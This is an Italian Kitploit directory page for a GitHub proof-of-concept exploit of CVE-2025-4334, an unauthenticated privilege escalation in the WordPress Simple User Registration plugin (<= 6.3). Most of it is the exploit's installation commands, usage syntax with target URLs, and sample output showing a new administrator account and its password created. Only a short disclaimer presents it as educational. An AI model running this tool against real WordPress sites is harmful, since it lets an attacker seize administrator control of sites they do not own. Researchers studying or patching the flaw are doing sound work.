Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-4334 — Exploit proof-of-concept per CVE-2025-4334, una vulnerabilità di escalation dei privilegi nel plugin WordPress Simple User Registration (<= 6.3), che consente a utenti non autenticati di creare account amministratore. | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Escalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Exploit proof-of-concept per CVE-2025-4334, una vulnerabilità di escalation dei privilegi nel plugin WordPress Simple User Registration (<= 6.3), che consente a utenti non autenticati di creare account amministratore.

Vedi Repository
4111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Logo di WordPress

CVE-2025-4334 - Simple User Registration <= 6.3 – Escalation dei privilegi non autenticata

Titolo dell'exploit: Simple User Registration <= 6.3 – Escalation dei privilegi non autenticata Autore: Gaurav Bhattacharjee (0xgh057r3c0n) ID CVE: CVE-2025-4334

Questo exploit prende di mira una vulnerabilità nel plugin Simple User Registration per WordPress (<= v6.3), consentendo a attaccanti non autenticati di escalare i privilegi e creare un nuovo account amministratore.


⚙️ Installazione

Clona il repository e installa le dipendenze Python richieste:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Dipendenze:

  • requests
  • colorama

🚀 Utilizzo

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Argomenti:

  • -u / --url → URL base di WordPress (es. https://target.com/wordpress/)
  • --form → URL completo del modulo di registrazione (es. https://target.com/wpr/default-registration/)

Esempio:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Esempio di Output

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Disclaimer

Questo strumento è fornito solo per scopi educativi e di ricerca. L'uso non autorizzato contro sistemi senza permesso è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.


📄 Licenza

Questo progetto è concesso in licenza secondo la Licenza MIT.


Scarica lo strumento